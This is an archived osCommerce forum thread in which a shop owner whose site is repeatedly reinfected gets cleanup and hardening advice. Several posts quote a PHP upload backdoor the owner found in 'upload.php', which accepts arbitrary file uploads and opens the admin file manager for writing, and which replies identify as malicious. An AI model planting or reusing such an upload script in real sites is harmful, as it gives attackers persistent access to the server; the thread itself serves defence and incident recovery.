Jump to content
dev osCommerce
Forum
  • Checkout
  • Login
  • Contact Us
  • Get in touch

osCommerce

The e-commerce.

New Demo
Our Partners

Malware Keeps Coming Back

Kerrigan

By Kerrigan
in Security

Recommended Posts

Kerrigan

Kerrigan

Posted
Posted

Hello. I have removed Malware in the recent past and installed all of the security measures that I could find to stop it from coming back, but it keeps coming back. Here are some of the security add-ons that I have installed:

 

-Security Pro

-IP Trap

-Site Monitor (almost finished)

 

When I have cleared my site of any Malware in the past, I have downloaded the whole site, found all of the Malware code (through grepWin), removed it and then re-uploaded it after installing a security measure. Now it seems that I can't even find the Malware code, even though it keeps popping up. It keeps changing names too:

 

-0200.in a couple of days ago

-1002.in today

-Other names in the past

 

So, a couple of questions: how do I find the Malware code to get rid of it and how do I keep it from coming back? Thanks...

Guest

Guest

Posted
Posted

Kerrigan,

 

1) Look for 'clone' files, which are files named to similar oscommerce files. These files usually contain 'backdoors' that allow the hacker to re-enter the website whenever they wish.

2) Look at your .htaccess file for malicious entries that could again, allow the hacker to regain access.

3) Change all password, admin, cpanel and FTP. The hacker could have gained access using your passwords and is entering un-noticed.

4) Check with your hosting provider to ensure they are maintaining tight security on their servers. Some hosting providers don't update security as they should because it costs them money.

 

 

 

Chris

Guest

Guest

Posted
Posted

Good point Mark ! I forgot to mention that.

 

 

 

Chris

geoffreywalton

♥geoffreywalton

Posted
Posted

You also forgot to mention you need to install the ht access and anti-xss contributions.

 

Have look at the "Been Hacked" link in my profile for links to these.

 

HTH

 

G

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Kerrigan

Kerrigan

Posted
  • Author
Posted

Kerrigan,

 

1) Look for 'clone' files, which are files named to similar oscommerce files. These files usually contain 'backdoors' that allow the hacker to re-enter the website whenever they wish.

2) Look at your .htaccess file for malicious entries that could again, allow the hacker to regain access.

3) Change all password, admin, cpanel and FTP. The hacker could have gained access using your passwords and is entering un-noticed.

4) Check with your hosting provider to ensure they are maintaining tight security on their servers. Some hosting providers don't update security as they should because it costs them money.

 

 

 

Chris

 

Thanks Chris.

 

1) I found an "upload.php" file that I wasn't sure if it belonged there. Here is the code from that file:

 

<?php
$fp = fopen("admin/file_manager.php","w");
$target = "";
$target = $target . basename( $_FILES['uploaded']['name']) ;
$ok=1;
if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target))
{
echo "The file ". basename( $_FILES['uploadedfile']['name']). " has been uploaded";
}
?>
<form enctype="multipart/form-data" method="POST">
Please choose a file: <input name="uploaded" type="file" /><br />
<input type="submit" value="Upload" />
</form>

 

Can anyone tell from this code if this file belongs or not?

 

2) Here is the code from my .htaccess file that is in my store (catalog) folder:

 

<?php
$fp = fopen("admin/file_manager.php","w");
$target = "";
$target = $target . basename( $_FILES['uploaded']['name']) ;
$ok=1;
if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target))
{
echo "The file ". basename( $_FILES['uploadedfile']['name']). " has been uploaded";
}
?>
<form enctype="multipart/form-data" method="POST">
Please choose a file: <input name="uploaded" type="file" /><br />
<input type="submit" value="Upload" />
</form>

 

I'm not sure if there is anything in there that shouldn't be there. Can you tell if there is? Also, should I check the .htaccess files in my "admin" and "includes" folders too?

 

3) I've already done that and will do it again.

 

4) What do I ask them when I call them...specifically? Thanks for all your help!

Kerrigan

Kerrigan

Posted
  • Author
Posted

And check your own PC that you use to access your site for virus. They could be harvesting your usernames/passwords right off of your home computer.

 

Thanks Mark. I've already done this to one computer, but hadn't to the other. I am currently checking it with SpyBot, MalwareBytes and Kaspersky.

Kerrigan

Kerrigan

Posted
  • Author
Posted

You also forgot to mention you need to install the ht access and anti-xss contributions.

 

Have look at the "Been Hacked" link in my profile for links to these.

 

HTH

 

G

 

Thanks Geoffrey. I will be adding this two contributions now.

mdtaylorlrim

♥mdtaylorlrim

Posted
Posted

Thanks Chris.

 

1) I found an "upload.php" file that I wasn't sure if it belonged there. Here is the code from that file:

 

<?php
$fp = fopen("admin/file_manager.php","w");
$target = "";
$target = $target . basename( $_FILES['uploaded']['name']) ;
$ok=1;
if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target))
{
echo "The file ". basename( $_FILES['uploadedfile']['name']). " has been uploaded";
}
?>
<form enctype="multipart/form-data" method="POST">
Please choose a file: <input name="uploaded" type="file" /><br />
<input type="submit" value="Upload" />
</form>

 

Can anyone tell from this code if this file belongs or not?

 

2) Here is the code from my .htaccess file that is in my store (catalog) folder:

 

<?php
$fp = fopen("admin/file_manager.php","w");
$target = "";
$target = $target . basename( $_FILES['uploaded']['name']) ;
$ok=1;
if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target))
{
echo "The file ". basename( $_FILES['uploadedfile']['name']). " has been uploaded";
}
?>
<form enctype="multipart/form-data" method="POST">
Please choose a file: <input name="uploaded" type="file" /><br />
<input type="submit" value="Upload" />
</form>

 

I'm not sure if there is anything in there that shouldn't be there. Can you tell if there is? Also, should I check the .htaccess files in my "admin" and "includes" folders too?

 

3) I've already done that and will do it again.

 

4) What do I ask them when I call them...specifically? Thanks for all your help!

Doesn't really matter. If you followed security directions you do not even have a file_manager.php file, and your admin directory has been renamed. But no, that code should not be in the .htaccess file and you should not have an upload.php file with that code in it.

Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?

Kerrigan

Kerrigan

Posted
  • Author
Posted

Doesn't really matter. If you followed security directions you do not even have a file_manager.php file, and your admin directory has been renamed. But no, that code should not be in the .htaccess file and you should not have an upload.php file with that code in it.

 

Just at of curiosity, what code SHOULD be in .htaccess file? Yes, you are right, I don't have a "file_manager.php" file anymore. However, I chose not to rename the "admin" folder as it seemed to be optional in the instructions and not that important. I have deleted the "upload.php" file and have added the security code to the .htaccess file.

 

However, I'm kind of confused about the anti-xss contribution. Is it just a "read me" file. The instructions aren't very clear in it...at least not in my mind. Also, I don't think anyone has offered up any ways to find and remove the malicious code already on my website. My website is downloaded and I couldn't find any bad code with grepWin this time. Any other ideas on how to find it and remove it?

Wayne Weedon

Wayne Weedon

Posted
Posted

Not really optional, once they find yours is there they will keep on banging away at it.

 

my own .htaccess file contains basically blocks to keep a handful of countries IP's from accessing my site, but yours above has been created/doctored for illegal/malicious use.

 

Wayne...

mdtaylorlrim

♥mdtaylorlrim

Posted
Posted

Just at of curiosity, what code SHOULD be in .htaccess file? Yes, you are right, I don't have a "file_manager.php" file anymore. However, I chose not to rename the "admin" folder as it seemed to be optional in the instructions and not that important.

As long as you password protect your admin directory you should be ok. THAT, is one thing that is coded into an .htaccess file.

 

In fact, there are literally dozens of things that can and often does go into an .htaccess file. With respect to osCommerce, the common things are directory passwords, URL SEO in the form of URL ReWriting, URL ReWriting to make your admin directory https only, and a couple of other things. But, in all the .htaccess file is very versatile and can do many different things. Therefore, there is no definitive answer as to what should be in yours.

Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?

Kerrigan

Kerrigan

Posted
  • Author
Posted

As long as you password protect your admin directory you should be ok. THAT, is one thing that is coded into an .htaccess file.

 

Wait, how do I password protect my admin directory? I don't see that in my .htaccess file at all...

Guest

Guest

Posted
Posted

Kerrigan,

 

Take the time to review the security forum. Everything you need to secure v2.2 RC2a is there. To answer your question, you can password protect your admin from the file manager in your cpanel. This will add another security layer to your admin area.

 

 

Chris

mdtaylorlrim

♥mdtaylorlrim

Posted
Posted

Wait, how do I password protect my admin directory? I don't see that in my .htaccess file at all...

In your cPanel 'Dashboard' you will find the function to 'Protect Directories' or 'Directory Security' or something real similar. (I don't think it is in the file manager. May be wrong.)

Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?

Kerrigan

Kerrigan

Posted
  • Author
Posted

In your cPanel 'Dashboard' you will find the function to 'Protect Directories' or 'Directory Security' or something real similar. (I don't think it is in the file manager. May be wrong.)

Thanks Mark!

Kerrigan

Kerrigan

Posted
  • Author
Posted

Well, I've been attacked again. This time by 7774.in. I don't think anyone has offered up any ways to find and remove the malicious code already on my website. My website is downloaded and I couldn't find any bad code with grepWin this time. Any other ideas on how to find it and remove it?

burt

burt

Posted
Posted

So, you've been hacked. Now what? Every, and I do mean EVERY day, I see this question come up in the osCommerce forum or from someone emailing me to ask advice about it. So, here's the lowdown on what you need to do;

 

1. NUKE your entire osCommerce site.

2. Restore from a known good backup.

3. Lockdown the site so the hack cannot happen again.

 

Easy as 123.

 

I'm about to cry because I don't have a backup…

 

In this case, you need to determine how much work you have put into your osCommerce site.

 

If it's plain jane oscommerce with maybe a new logo and a couple of contributions, then the easiest way is to simply carry out #1, then upload a new osCommerce, then carry out #3.

 

If you have done major work in your osCommerce site, then you need to go through EVERY file, line by line to ensure there is no hacker code present. You also need to delete any file that you do not recognise. Then forget #1, forget #2 and carry out #3.

 

How do you lockdown a site?

 

Follow the instructions in this thread.

 

I don't think I can do that, it looks like a big job. I don't know osCommerce well enough to know what should be there and what shouldn't…

 

Pay a professional to do it for you. There are a handful of people on the osCommerce forum who can achieve all this for you, at low cost, and rapidly – within a day, your site can be cleansed and locked down.

Guest

Guest

Posted
Posted

All good advice except if the problems lies with your host (example Godaddy) then I don't know what you can do except change hosts?

 

Yes a lot of Godaddy sites have been recently hacked again :(

Archived

This topic is now archived and is closed to further replies.

Go to topic listing
×
×
  • Create New...